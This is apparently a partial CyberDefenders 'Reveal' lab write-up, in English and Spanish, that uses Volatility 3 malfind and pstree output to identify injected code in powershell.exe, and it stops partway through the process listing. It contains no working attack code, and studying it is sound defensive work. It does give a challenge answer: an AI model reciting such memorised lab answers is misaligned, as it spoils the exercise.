Instructions:
- Uncompress the lab (pass: cyberdefenders.org)
Scenario:
As a cybersecurity analyst for a leading financial institution, an alert from your SIEM solution has flagged unusual activity on an internal workstation. Given the sensitive financial data at risk, immediate action is required to prevent potential breaches.
Your task is to delve into the provided memory dump from the compromised system. You need to identify basic Indicators of Compromise (IOCs) and determine the extent of the intrusion. Investigate the malicious commands or files executed in the environment, and report your findings in detail to aid in remediation and enhance future defenses.
Tools:
#1 Respuesta: Powershell
Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?
Obtención de la evidencia
Se utilizó el siguiente comando para identificar posibles procesos maliciosos que estén ejecutando código sospechoso en el espacio de memoria:
vol -f 192-Reveal.dmp windows.malfind
Output:
Volatility 3 Framework 2.7.1
Progress: 100.00 PDB scanning finished
PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Notes Hexdump Disasm
2820 smartscreen.ex 0x153f35a0000 0x153f35bffff VadS PAGE_EXECUTE_READWRITE 1 1 Disabled N/A
48 89 54 24 10 48 89 4c H.T$.H.L
24 08 4c 89 44 24 18 4c $.L.D$.L
89 4c 24 20 48 8b 41 28 .L$.H.A(
48 8b 48 08 48 8b 51 50 H.H.H.QP
48 83 e2 f8 48 8b ca 48 H...H..H
b8 60 00 5a f3 53 01 00 .`.Z.S..
00 48 2b c8 48 81 f9 70 .H+.H..p
0f 00 00 76 09 48 c7 c1 ...v.H..
0x153f35a0000: mov qword ptr [rsp + 0x10], rdx
0x153f35a0005: mov qword ptr [rsp + 8], rcx
0x153f35a000a: mov qword ptr [rsp + 0x18], r8
0x153f35a000f: mov qword ptr [rsp + 0x20], r9
0x153f35a0014: mov rax, qword ptr [rcx + 0x28]
0x153f35a0018: mov rcx, qword ptr [rax + 8]
0x153f35a001c: mov rdx, qword ptr [rcx + 0x50]
0x153f35a0020: and rdx, 0xfffffffffffffff8
0x153f35a0024: mov rcx, rdx
0x153f35a0027: movabs rax, 0x153f35a0060
0x153f35a0031: sub rcx, rax
0x153f35a0034: cmp rcx, 0xf70
0x153f35a003b: jbe 0x153f35a0046
3692 powershell.exe 0x1cb6aa50000 0x1cb6aa5ffff VadS PAGE_EXECUTE_READWRITE 2 1 Disabled N/A
00 00 00 00 00 00 00 00 ........
62 17 15 5c 8c 82 00 01 b..\....
ee ff ee ff 02 00 00 00 ........
20 01 a5 6a cb 01 00 00 ...j....
20 01 a5 6a cb 01 00 00 ...j....
00 00 a5 6a cb 01 00 00 ...j....
00 00 a5 6a cb 01 00 00 ...j....
0f 00 00 00 00 00 00 00 ........
0x1cb6aa50000: add byte ptr [rax], al
0x1cb6aa50002: add byte ptr [rax], al
0x1cb6aa50004: add byte ptr [rax], al
0x1cb6aa50006: add byte ptr [rax], al
3692 powershell.exe 0x1cb6c3e0000 0x1cb6c3e6fff VadS PAGE_EXECUTE_READWRITE 1 1 Disabled N/A
00 00 00 00 00 00 00 00 ........
10 7b ac 6c cb 01 00 00 .{.l....
10 7b ac 6c cb 01 00 00 .{.l....
00 00 ac 6c cb 01 00 00 ...l....
b0 0d 3e 6c cb 01 00 00 ..>l....
00 10 3e 6c cb 01 00 00 ..>l....
00 70 3e 6c cb 01 00 00 .p>l....
01 00 00 00 00 00 00 00 ........
0x1cb6c3e0000: add byte ptr [rax], al
0x1cb6c3e0002: add byte ptr [rax], al
0x1cb6c3e0004: add byte ptr [rax], al
0x1cb6c3e0006: add byte ptr [rax], al
0x1cb6c3e0008: adc byte ptr [rbx - 0x54], bh
0x1cb6c3e000b: insb byte ptr [rdi], dx
0x1cb6c3e000c: retf
0x1cb6c3e000d: add dword ptr [rax], eax
0x1cb6c3e000f: add byte ptr [rax], dl
0x1cb6c3e0011: jnp 0x1cb6c3dffbf
0x1cb6c3e0013: insb byte ptr [rdi], dx
0x1cb6c3e0014: retf
0x1cb6c3e0015: add dword ptr [rax], eax
0x1cb6c3e0017: add byte ptr [rax], al
0x1cb6c3e0019: add byte ptr [rsp + rbp*2 + 0x1cb], ch
0x1cb6c3e0020: mov al, 0xd
0x1cb6c3e0022: insb byte ptr [rdi], dx
0x1cb6c3e0024: retf
0x1cb6c3e0025: add dword ptr [rax], eax
0x1cb6c3e0027: add byte ptr [rax], al
0x1cb6c3e0029: adc byte ptr [rsi], bh
0x1cb6c3e002b: insb byte ptr [rdi], dx
0x1cb6c3e002c: retf
0x1cb6c3e002d: add dword ptr [rax], eax
0x1cb6c3e002f: add byte ptr [rax], al
0x1cb6c3e0031: jo 0x1cb6c3e0071
0x1cb6c3e0033: insb byte ptr [rdi], dx
0x1cb6c3e0034: retf
0x1cb6c3e0035: add dword ptr [rax], eax
0x1cb6c3e0037: add byte ptr [rcx], al
0x1cb6c3e0039: add byte ptr [rax], al
0x1cb6c3e003b: add byte ptr [rax], al
0x1cb6c3e003d: add byte ptr [rax], al
3692 powershell.exe 0x1cb6cac0000 0x1cb6cacffff VadS PAGE_EXECUTE_READWRITE 9 1 Disabled N/A
00 00 00 00 00 00 00 00 ........
28 e6 be 6b 9b 65 00 01 (..k.e..
ee ff ee ff 02 00 00 00 ........
20 01 ac 6c cb 01 00 00 ...l....
20 01 ac 6c cb 01 00 00 ...l....
00 00 ac 6c cb 01 00 00 ...l....
00 00 ac 6c cb 01 00 00 ...l....
0f 00 00 00 00 00 00 00 ........
0x1cb6cac0000: add byte ptr [rax], al
0x1cb6cac0002: add byte ptr [rax], al
0x1cb6cac0004: add byte ptr [rax], al
0x1cb6cac0006: add byte ptr [rax], al
0x1cb6cac0008: sub dh, ah
0x1cb6cac000a: mov esi, 0x659b6b
0x1cb6cac000f: add esi, ebp
3692 powershell.exe 0x7df44e2c0000 0x7df44e2cffff VadS PAGE_EXECUTE_READWRITE 1 1 Disabled N/A
00 00 00 00 00 00 00 00 ........
78 0d 00 00 00 00 00 00 x.......
0c 00 00 00 49 c7 c2 00 ....I...
00 00 00 48 b8 d0 49 71 ...H..Iq
ad ff 7f 00 00 ff e0 49 .......I
c7 c2 01 00 00 00 48 b8 ......H.
d0 49 71 ad ff 7f 00 00 .Iq.....
ff e0 49 c7 c2 02 00 00 ..I.....
0x7df44e2c0000: add byte ptr [rax], al
0x7df44e2c0002: add byte ptr [rax], al
0x7df44e2c0004: add byte ptr [rax], al
0x7df44e2c0006: add byte ptr [rax], al
0x7df44e2c0008: js 0x7df44e2c0017
0x7df44e2c000a: add byte ptr [rax], al
0x7df44e2c000c: add byte ptr [rax], al
0x7df44e2c000e: add byte ptr [rax], al
0x7df44e2c0010: or al, 0
0x7df44e2c0012: add byte ptr [rax], al
0x7df44e2c0014: mov r10, 0
0x7df44e2c001b: movabs rax, 0x7fffad7149d0
0x7df44e2c0025: jmp rax
0x7df44e2c0027: mov r10, 1
0x7df44e2c002e: movabs rax, 0x7fffad7149d0
0x7df44e2c0038: jmp rax
3692 powershell.exe 0x7df44e2d0000 0x7df44e36ffff VadS PAGE_EXECUTE_READWRITE 2 1 Disabled N/A
d8 ff ff ff ff ff ff ff ........
08 00 00 00 00 00 00 00 ........
01 00 00 00 00 00 00 00 ........
00 02 0e 03 38 00 00 00 ....8...
08 41 d7 07 0c 00 00 00 .A......
10 68 2a 4e ff 7f 00 00 .h*N....
20 40 11 4e ff 7f 00 00 .@.N....
d0 d3 36 4e ff 7f 00 00 ..6N....
0x7df44e2d0000: fdivr st(7)
Identificación del Proceso Malicioso
El análisis realizado con el plugin malfind
identificó varios bloques de memoria asociados con el proceso powershell.exe
(PID: 3692), los cuales presentan una configuración de protección PAGE_EXECUTE_READWRITE
. Esta configuración es inusual para procesos legítimos, ya que generalmente sólo requieren permisos de lectura o escritura, pero no ambos simultáneamente junto con ejecución. Esto indica la posibilidad de inyección de código o ejecución de código malicioso en la memoria.
A continuación, se presentan los hallazgos más relevantes:
00 00 00 00 00 00 00 00 ........
62 17 15 5c 8c 82 00 01 b..\....
ee ff ee ff 02 00 00 00 ........
20 01 a5 6a cb 01 00 00 ...j....
Este bloque de memoria muestra instrucciones de ensamblador que indican la ejecución de código, posiblemente inyectado por un atacante. Además, se detectó un segundo bloque sospechoso en la dirección virtual 0x7df44e2c0000
.
4. Contexto del Proceso Identificado
Para entender mejor la naturaleza y el contexto del proceso malicioso, se realizó un análisis del árbol de procesos utilizando el siguiente comando:
vol -f 192-Reveal.dmp windows.pstree
Output:
olatility 3 Framework 2.7.1
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime Audit Cmd Path
4 0 System 0xc90c0345b040 138 - N/A False 2024-07-04 10:44:48.000000 N/A - - -
* 1452 4 MemCompression 0xc90c03551040 66 - N/A False 2024-07-04 10:44:51.000000 N/A MemCompression - -
* 92 4 Registry 0xc90c0349e080 4 - N/A False 2024-07-04 10:44:43.000000 N/A Registry - -
* 300 4 smss.exe 0xc90c06148040 2 - N/A False 2024-07-04 10:44:48.000000 N/A \Device\HarddiskVolume3\Windows\System32\smss.exe - -
416 404 csrss.exe 0xc90c070af140 11 - 0 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 C:\Windows\system32\csrss.exe
492 404 wininit.exe 0xc90c07164080 1 - 0 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\wininit.exe - -
* 636 492 lsass.exe 0xc90c070ab080 8 - 0 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\lsass.exe C:\Windows\system32\lsass.exe C:\Windows\system32\lsass.exe
* 628 492 services.exe 0xc90c070ad140 8 - 0 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\services.exe C:\Windows\system32\services.exe C:\Windows\system32\services.exe
** 5760 628 svchost.exe 0xc90c0986a2c0 7 - 0 False 2024-07-04 10:45:13.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe - -
** 6016 628 svchost.exe 0xc90c0967d080 9 - 0 False 2024-07-04 10:46:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe - -
** 2956 628 svchost.exe 0xc90c08637240 26 - 0 False 2024-07-04 10:44:53.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe - -
** 7692 628 SgrmBroker.exe 0xc90c0a1c5240 7 - 0 False 2024-07-04 10:46:53.000000 N/A \Device\HarddiskVolume3\Windows\System32\SgrmBroker.exe - -
** 656 628 svchost.exe 0xc90c07d5f2c0 23 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p C:\Windows\System32\svchost.exe
** 1040 628 svchost.exe 0xc90c07da8280 22 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p C:\Windows\System32\svchost.exe
*** 3504 1040 ctfmon.exe 0xc90c08838240 10 - 1 False 2024-07-04 10:44:59.000000 N/A \Device\HarddiskVolume3\Windows\System32\ctfmon.exe "ctfmon.exe" C:\Windows\system32\ctfmon.exe
** 1680 628 svchost.exe 0xc90c0350d080 6 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k appmodel -p C:\Windows\system32\svchost.exe
** 9340 628 svchost.exe 0xc90c09ad4080 3 - 0 False 2024-07-15 04:14:05.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WbioSvcGroup C:\Windows\system32\svchost.exe
** 1688 628 svchost.exe 0xc90c03509080 5 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe - -
** 1944 628 svchost.exe 0xc90c080cc080 16 - 0 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p C:\Windows\system32\svchost.exe
** 1696 628 svchost.exe 0xc90c03507080 15 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe - -
** 1952 628 svchost.exe 0xc90c080cd080 10 - 0 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe - -
** 2080 628 svchost.exe 0xc90c0821f080 13 - 0 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k utcsvc -p C:\Windows\System32\svchost.exe
** 420 628 svchost.exe 0xc90c07d462c0 16 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p C:\Windows\system32\svchost.exe
** 7460 628 OfficeClickToR 0xc90c0c8ea080 19 - 0 False 2024-07-15 04:06:45.000000 N/A \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe - -
*** 10108 7460 AppVShNotify.e 0xc90c0c8d7080 3 - 1 False 2024-07-15 04:14:55.000000 N/A \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe - -
** 2216 628 wlms.exe 0xc90c08167240 2 - 0 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\wlms\wlms.exe - -
** 2856 628 msdtc.exe 0xc90c08527280 9 - 0 False 2024-07-04 10:44:53.000000 N/A \Device\HarddiskVolume3\Windows\System32\msdtc.exe - -
** 2736 628 dllhost.exe 0xc90c08548280 11 - 0 False 2024-07-04 10:44:53.000000 N/A \Device\HarddiskVolume3\Windows\System32\dllhost.exe - -
** 6268 628 SecurityHealth 0xc90c082ab080 9 - 0 False 2024-07-04 10:45:15.000000 N/A \Device\HarddiskVolume3\Windows\System32\SecurityHealthService.exe C:\Windows\system32\SecurityHealthService.exe C:\Windows\system32\SecurityHealthService.exe
** 3252 628 svchost.exe 0xc90c08759300 14 - 1 False 2024-07-04 10:44:59.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup C:\Windows\system32\svchost.exe
** 440 628 svchost.exe 0xc90c07d3e240 73 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p C:\Windows\system32\svchost.exe
*** 3216 440 sihost.exe 0xc90c087450c0 11 - 1 False 2024-07-04 10:44:59.000000 N/A \Device\HarddiskVolume3\Windows\System32\sihost.exe sihost.exe C:\Windows\system32\sihost.exe
*** 1608 440 taskhostw.exe 0xc90c09762080 5 - 1 False 2024-07-15 04:13:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\taskhostw.exe taskhostw.exe C:\Windows\system32\taskhostw.exe
*** 3316 440 taskhostw.exe 0xc90c087d4300 9 - 1 False 2024-07-04 10:44:59.000000 N/A \Device\HarddiskVolume3\Windows\System32\taskhostw.exe taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} C:\Windows\system32\taskhostw.exe
** 2232 628 vm3dservice.ex 0xc90c08169240 3 - 0 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\vm3dservice.exe - -
*** 2388 2232 vm3dservice.ex 0xc90c0838a200 4 - 1 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\vm3dservice.exe - -
** 832 628 svchost.exe 0xc90c092e2080 7 - 1 False 2024-07-15 07:00:06.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k PrintWorkflow C:\Windows\system32\svchost.exe
** 1864 628 spoolsv.exe 0xc90c0809f200 12 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\spoolsv.exe C:\Windows\System32\spoolsv.exe C:\Windows\System32\spoolsv.exe
** 2248 628 vmtoolsd.exe 0xc90c08127080 11 - 0 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Program Files\VMware\VMware Tools\vmtoolsd.exe - -
** 3148 628 svchost.exe 0xc90c08aad080 11 - 1 False 2024-07-04 10:45:01.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p C:\Windows\system32\svchost.exe
** 2256 628 VGAuthService. 0xc90c08166080 2 - 0 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe - -
** 9296 628 SearchIndexer. 0xc90c07f3a080 17 - 0 False 2024-07-15 04:16:20.000000 N/A \Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe C:\Windows\system32\SearchIndexer.exe /Embedding C:\Windows\system32\SearchIndexer.exe
*** 8864 9296 SearchFilterHo 0xc90c0a077080 5 - 0 False 2024-07-15 06:59:00.000000 N/A \Device\HarddiskVolume3\Windows\System32\SearchFilterHost.exe "C:\Windows\system32\SearchFilterHost.exe" 0 804 808 816 8192 812 788 C:\Windows\system32\SearchFilterHost.exe
*** 6388 9296 SearchProtocol 0xc90c098dc080 7 - 0 False 2024-07-15 06:58:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\SearchProtocolHost.exe "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe3_ Global\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\system32\SearchProtocolHost.exe
*** 4164 9296 SearchProtocol 0xc90c0863a080 4 - 1 False 2024-07-15 04:17:20.000000 N/A \Device\HarddiskVolume3\Windows\System32\SearchProtocolHost.exe "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3274565340-3808842250-3617890653-10012_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3274565340-3808842250-3617890653-10012 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1" C:\Windows\system32\SearchProtocolHost.exe
** 1112 628 svchost.exe 0xc90c07dc72c0 41 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p C:\Windows\system32\svchost.exe
** 2272 628 MsMpEng.exe 0xc90c08168080 9 - 0 False 2024-07-04 10:44:52.000000 N/A \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe "C:\Program Files\Windows Defender\MsMpEng.exe" C:\Program Files\Windows Defender\MsMpEng.exe
** 872 628 svchost.exe 0xc90c07c6f2c0 16 - 0 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k RPCSS -p C:\Windows\system32\svchost.exe
** 6760 628 svchost.exe 0xc90c09408080 8 - 0 False 2024-07-04 10:46:54.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p C:\Windows\System32\svchost.exe
** 1260 628 svchost.exe 0xc90c07e7a2c0 24 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p C:\Windows\System32\svchost.exe
** 1520 628 svchost.exe 0xc90c07f5a2c0 12 - 0 False 2024-07-04 10:44:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p C:\Windows\System32\svchost.exe
*** 7428 1520 audiodg.exe 0xc90c03542080 6 - 0 False 2024-07-15 06:58:15.000000 N/A \Device\HarddiskVolume3\Windows\System32\audiodg.exe C:\Windows\system32\AUDIODG.EXE 0x4f0 C:\Windows\system32\AUDIODG.EXE
** 7792 628 svchost.exe 0xc90c08ee8080 3 - 0 False 2024-07-04 10:46:35.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p C:\Windows\system32\svchost.exe
** 764 628 svchost.exe 0xc90c07bef240 23 - 0 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p C:\Windows\system32\svchost.exe
*** 4356 764 StartMenuExper 0xc90c08c8e080 13 - 1 False 2024-07-04 10:45:02.000000 N/A \Device\HarddiskVolume3\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
*** 1400 764 RuntimeBroker. 0xc90c0c717080 4 - 1 False 2024-07-15 04:09:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\RuntimeBroker.exe - -
*** 2820 764 smartscreen.ex 0xc90c09850080 13 - 1 False 2024-07-15 06:59:57.000000 N/A \Device\HarddiskVolume3\Windows\System32\smartscreen.exe C:\Windows\System32\smartscreen.exe -Embedding C:\Windows\System32\smartscreen.exe
*** 7176 764 SkypeApp.exe 0xc90c09614080 55 - 1 False 2024-07-04 10:45:57.000000 N/A \Device\HarddiskVolume3\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe - -
*** 2828 764 WmiPrvSE.exe 0xc90c0850e080 12 - 0 False 2024-07-04 10:44:53.000000 N/A \Device\HarddiskVolume3\Windows\System32\wbem\WmiPrvSE.exe - -
*** 4500 764 RuntimeBroker. 0xc90c08e39340 3 - 1 False 2024-07-04 10:45:02.000000 N/A \Device\HarddiskVolume3\Windows\System32\RuntimeBroker.exe - -
*** 7848 764 RuntimeBroker. 0xc90c09090080 3 - 1 False 2024-07-04 10:46:21.000000 N/A \Device\HarddiskVolume3\Windows\System32\RuntimeBroker.exe - -
*** 7336 764 RuntimeBroker. 0xc90c09578080 5 - 1 False 2024-07-04 10:46:48.000000 N/A \Device\HarddiskVolume3\Windows\System32\RuntimeBroker.exe - -
*** 6568 764 Calculator.exe 0xc90c0c2a3080 21 - 1 False 2024-07-15 04:09:51.000000 N/A \Device\HarddiskVolume3\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe - -
*** 6700 764 ApplicationFra 0xc90c07eb0080 12 - 1 False 2024-07-04 10:46:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\ApplicationFrameHost.exe C:\Windows\system32\ApplicationFrameHost.exe -Embedding C:\Windows\system32\ApplicationFrameHost.exe
*** 4780 764 RuntimeBroker. 0xc90c0a1ee0c0 3 - 1 False 2024-07-15 04:02:32.000000 N/A \Device\HarddiskVolume3\Windows\System32\RuntimeBroker.exe - -
*** 5180 764 RuntimeBroker. 0xc90c092cb080 6 - 1 False 2024-07-04 10:45:09.000000 N/A \Device\HarddiskVolume3\Windows\System32\RuntimeBroker.exe - -
*** 4796 764 RuntimeBroker. 0xc90c091372c0 12 - 1 False 2024-07-04 10:45:03.000000 N/A \Device\HarddiskVolume3\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding C:\Windows\System32\RuntimeBroker.exe
*** 6212 764 dllhost.exe 0xc90c0a5e4080 7 - 1 False 2024-07-04 10:46:52.000000 N/A \Device\HarddiskVolume3\Windows\System32\dllhost.exe - -
*** 4296 764 ShellExperienc 0xc90c06982080 13 - 1 False 2024-07-15 04:02:32.000000 N/A \Device\HarddiskVolume3\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe - -
*** 6604 764 TextInputHost. 0xc90c09950340 10 - 1 False 2024-07-04 10:45:16.000000 N/A \Device\HarddiskVolume3\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
*** 4696 764 SearchApp.exe 0xc90c0900b080 52 - 1 False 2024-07-04 10:45:03.000000 N/A \Device\HarddiskVolume3\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
*** 8280 764 SkypeBackgroun 0xc90c083af080 4 - 1 False 2024-07-15 04:06:48.000000 N/A \Device\HarddiskVolume3\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe - -
*** 8544 764 dllhost.exe 0xc90c093130c0 5 - 0 False 2024-07-15 04:06:51.000000 N/A \Device\HarddiskVolume3\Windows\System32\dllhost.exe - -
*** 7160 764 SearchApp.exe 0xc90c09922080 30 - 1 False 2024-07-15 04:06:33.000000 N/A \Device\HarddiskVolume3\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe - -
*** 6780 764 WWAHost.exe 0xc90c0968a340 31 - 1 False 2024-07-04 10:46:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\WWAHost.exe - -
* 748 492 fontdrvhost.ex 0xc90c07be9140 5 - 0 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\fontdrvhost.exe - -
512 484 csrss.exe 0xc90c07176080 13 - 1 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 C:\Windows\system32\csrss.exe
588 484 winlogon.exe 0xc90c07a22080 5 - 1 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\winlogon.exe winlogon.exe C:\Windows\system32\winlogon.exe
* 752 588 fontdrvhost.ex 0xc90c07beb140 5 - 1 False 2024-07-04 10:44:50.000000 N/A \Device\HarddiskVolume3\Windows\System32\fontdrvhost.exe - -
* 3616 588 userinit.exe 0xc90c088d2340 0 - 1 False 2024-07-04 10:44:59.000000 2024-07-04 10:45:23.000000 \Device\HarddiskVolume3\Windows\System32\userinit.exe - -
** 3656 3616 explorer.exe 0xc90c088d1340 111 - 1 False 2024-07-04 10:44:59.000000 N/A \Device\HarddiskVolume3\Windows\explorer.exe C:\Windows\Explorer.EXE C:\Windows\Explorer.EXE
*** 6368 3656 vmtoolsd.exe 0xc90c093a7080 10 - 1 False 2024-07-04 10:45:15.000000 N/A \Device\HarddiskVolume3\Program Files\VMware\VMware Tools\vmtoolsd.exe "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
*** 5488 3656 msedge.exe 0xc90c09380080 59 - 1 False 2024-07-04 10:45:13.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
**** 5792 5488 msedge.exe 0xc90c09916080 10 - 1 False 2024-07-04 10:45:14.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - -
**** 5088 5488 msedge.exe 0xc90c098c9080 11 - 1 False 2024-07-04 10:46:14.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=7556,i,4550380774351628999,14075719362826743519,262144 --variations-seed-version --mojo-platform-channel-handle=7548 /prefetch:8 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
**** 1920 5488 msedge.exe 0xc90c0c863080 16 - 1 False 2024-07-15 06:58:45.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - -
**** 5540 5488 msedge.exe 0xc90c096020c0 8 - 1 False 2024-07-04 10:45:13.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - -
**** 6404 5488 msedge.exe 0xc90c0cbbd300 15 - 1 False 2024-07-15 06:58:52.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - -
**** 5768 5488 msedge.exe 0xc90c08eed080 16 - 1 False 2024-07-04 10:45:14.000000 N/A \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - -
